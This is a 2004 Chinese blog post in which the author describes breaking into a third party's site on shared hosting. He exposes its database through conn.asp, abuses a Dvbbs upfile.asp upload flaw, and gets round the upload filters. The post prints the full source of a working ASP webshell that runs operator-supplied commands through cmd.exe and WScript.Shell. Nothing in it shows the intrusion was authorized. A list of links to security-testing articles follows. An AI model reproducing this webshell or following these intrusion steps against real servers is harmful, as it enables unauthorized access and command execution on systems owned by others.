对一个安全设置比较BT的虚拟主机的安全测试

原创 2004年10月15日 17:09:00

作者:血汉 文章来源:www.qfaq.com

前几天无聊时看到一个木马站,然后就对他进行了一番安全测试,发现是在一个虚拟主机上的,而虚拟主机的安全设置又比较高,我今天就把我是怎么进入这个木马站的经过写出来,里面没有设计到什么技术性的东西,只是把这次的思路说下,因为经验才是最重要的!
  首先看了下站.发现是动力的系统,看了下版本MyPower Ver3.51,当时还比较新,注入过滤的比较好,上传的地方也不能进行传ASP木马,当时就郁闷了,看了下能不能暴库,直接输入http://www.******.com/inc/conn.asp数据库直接暴了出来:

晕了,这么长的名字!!!现在我就可以把他的数据库给下来,然后去跑MD5密码,但是这样太费时间,又不是我等所为!在他的站转了一圈,发现没有什么可以利用的地方,于是用whois查了查他的主机上有多少站,http://whois.webhosting.info/*.*.*.*,一看,- IP hosts 118 Total Domains ... 
Showing 1 - 50 out of 118 
晕,怎么多,一个个的找找,麻烦的就不要看了,运气不错,找到一个动网论坛的,Dvbbs Version 6.1.0,看看upfile.asp,发现存在,直接用动网的漏洞利用工具上传一个ASP木马,显示是成功了,不过打开看的时候发现了"当前目录禁止运行asp程序的相关提示",晕,郁闷!!!看来非要手工不可了,不过手工上传偶是轻车熟路,把目录改成根目录,这里不可能不能运行asp程序了!
这里我就带过了,不熟悉的朋友可以去清风上找我以前的哪个动画教程!最后到了这里:

按此在新窗口打开图片

本来想接下来的事情会很顺利,那知道所有的难题都出在这里了!
   我本想先传一个海阳顶端的asp木马,但是当点保存的时候却出现了这样的情况,

按此在新窗口打开图片

我哪个晕啊,看来主机有信息拦截系统,我们不怕,我把asp网页加密下再试试!

郁闷中,刚才的警告信息又出来了,后来和几个朋友讨论了下,猜测他们的主机上的asp.dll文件把asp文件的上传给过滤了,算了,再辛苦下,直接手工传我们的asp木马,不过现在你要找个小点的了,因为太大的木马抓包的时候会很麻烦!我用的是猪蛋儿的那个独家后门!最后成功:

按此在新窗口打开图片

进去后发现主机做了安全策略,不管怎么跳转都只能在这一个目录里看,虽然我知道了那个木马站的实际路径,但是就是写不进去,而且主机也不允许在web里传asp程序,郁闷,命令也不可以执行,看来我们得到了一个没有什么用处的webshell!
  我找来了动鲨写的一个asp木马:

<%@ LANGUAGE="VBScript"  cODEpagE ="936" %>
<ObjEct Runat=sERvER iD=OFilElh scOpE=pagE classiD="clsiD:0D43FE01-F093-11CF-8940-00A0C9054228"></ObjEct>
<ObjEct runat=sErvEr iD=OScriptlhn scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%iF Err thEn%>
<ObjEct runat=sErvEr iD=OScriptlhn scOpE=pagE classiD="clsiD:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></ObjEct> 
<%EnD iF %>
<html>
<bODy>
<FORM ACtiOn="<%= REquEst.SErvErVAriAblEs("URL") %>" MEthOD="POST">
  <p>
    <input typE=tExt namE="cmD" sizE=60>
    <input typE=submit valuE="run">
  </p>
  <p><FOnt cOlOr="#0000FF">不管服务器是否修改了WSH的名字,都可以使用。</FOnt> </p>
  <p><FOnt cOlOr="#0000FF">动鲨制作,祝你好运!QQ:178383587</FOnt></p>
</FOrm>
<%  

Dim lhtmp
 On ErrOr rEsumE nExt  
 lhtmp = SERvER.MapPath("/")
 lhtmp = lhtmp + "/lhtmp.txt"
 call OScriptlhn.run ("D:/website/www.****.com/Web/cmD.EXE  /c " & rEquEst.FOrm("cmD") & ">" & lhtmp,0,truE)
 SEt OFilE = OFilElh.OpEnTExtFilE (lhtmp, 1, FAlsE, 0) 
%>
<PRE>
<br>
<% 
  IF (IsObjECt(OFilE)) ThEn
   On ErrOr rEsumE nExt
    REspOnsE.WritE sErvEr.htmlEncODE(OFilE.READAll)
    OFilE.ClOsE
    CAll OFilElh.DElEtEFilE(lhtmp, TruE)
  EnD IF
%>
</bODy>
</html>

然后我从本机上传一个cmd.exe到他的目录,本来想再传一个serv-u的溢出工具,但是扫了下他开放的端口,一看原来是微软的ftp,我哪个郁闷!
现在我虽然可以执行一点命令了,但是还是不能到木马站的哪个目录里,忽然想起了我不是知道他的实际目录吗,他的这个目录一定可写,要是不可写那他的站就没有办法管理了,不何不用copy命令把这里的asp木马copy过去! 20040925211402912.gif偶为偶的想法激动了一会,然后就执行了下命令:

按此在新窗口打开图片

打开看看成功了没有:

娃哈哈,成功了也!下面的事情我就不说了,我已经达到了渗透的目的,不过拿主机权限应该是比较难的啦!偶就不再继续了!

安全测试、渗透测试的理解

安全测试是侧重于应用程序所面对对安全威胁而进行的有关验证应用程序的安全服务和识别潜在安全性缺陷的过程。目的并不最终证明应用程序是安全的,而是用于验证存在哪些安全漏洞,来确保应用程序的安全。 渗透...
  • Joy0709
  • Joy0709
  • 2015年03月10日 11:44
  • 870

web安全测试服务开展流程简介

1、web安全测试简介 web安全测试业务主要围绕流程、标准、规范三个方面展开,其中流程是核心,标准和规范在流程运作中落地与执行。 2、web安全测试流程概要设计...
  • ilnature2008
  • ilnature2008
  • 2017年01月05日 17:08
  • 1131

API接口安全

API接口安全 1      基本概念 API(Application Programming Interface,应用程序编程接口)是一些预先定义的函数,目的是提供应用程序与开发人员基于...
  • phlf74
  • phlf74
  • 2017年08月08日 14:19
  • 913

对于web安全测试的一些感悟

起初对于web安全性测试有了很大的误区,作为一个菜鸟,我认为做安全性测试首先要以黑客的身份去看网站,找寻漏洞,进行入侵。为此,我找了很多家网站进行学习,如习科论坛等。也在项目中进行了尝试,找了个xss...
  • u03024218
  • u03024218
  • 2013年11月29日 13:58
  • 1834

《Web安全测试》读书笔记

《Web安全测试》读书笔记
  • ggf123456789
  • ggf123456789
  • 2015年10月08日 23:44
  • 1104

APP安全测试

1. 数据安全   App的安全问题首先是数据安全。App本地存储的数据和网络请求数据中有没有涉及到用户的隐私数据。   本地存储数据可以查看看应用的shared_prefs文件和数据库文件中的数...
  • xia_xia0919
  • xia_xia0919
  • 2016年01月12日 10:33
  • 3406

web常见安全问题以及测试方法

web安全是我们测试组一直以来作为和性能测试并驾齐驱的两个重点。开发的过程中还需要着重注意,该转义的地方转义;该屏蔽的地方屏蔽,该过滤的地方过滤等等。年底又到了,势必又有大批的发号抽奖之类的活动开发、...
  • test_soy
  • test_soy
  • 2015年10月15日 16:03
  • 1935

转载:Android APP安全测试入门

Android APP安全测试入门 转载地址:https://sobug.com/article/detail/7                作者:nx4dm1n ...
  • ggf123456789
  • ggf123456789
  • 2015年04月25日 18:22
  • 2445

软件安全测试之应用安全测试

先说几句废话,望大家海涵^_^ (如果你想从头开始一步步学习安全测试设计,请从我的上一篇文章开始一步步学习下去点击打开链接>,但如果因为工作进度很急,可以先跳过下面的”废话“直接参考总结好的测试方案)...
  • victory_xing126
  • victory_xing126
  • 2015年03月02日 21:26
  • 6980

最佳的75个安全测试工具

工具:Nessus(最好的开放源代码风险评估工具) 网址:http://www.nessus.org/ 类别:开放源码 平台:Linux/BSD/Unix 简介:Nessus是一款可以运行在L...
  • yefan2222
  • yefan2222
  • 2011年12月21日 13:52
  • 6400
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:对一个安全设置比较BT的虚拟主机的安全测试
举报原因:
原因补充:

(最多只允许输入30个字)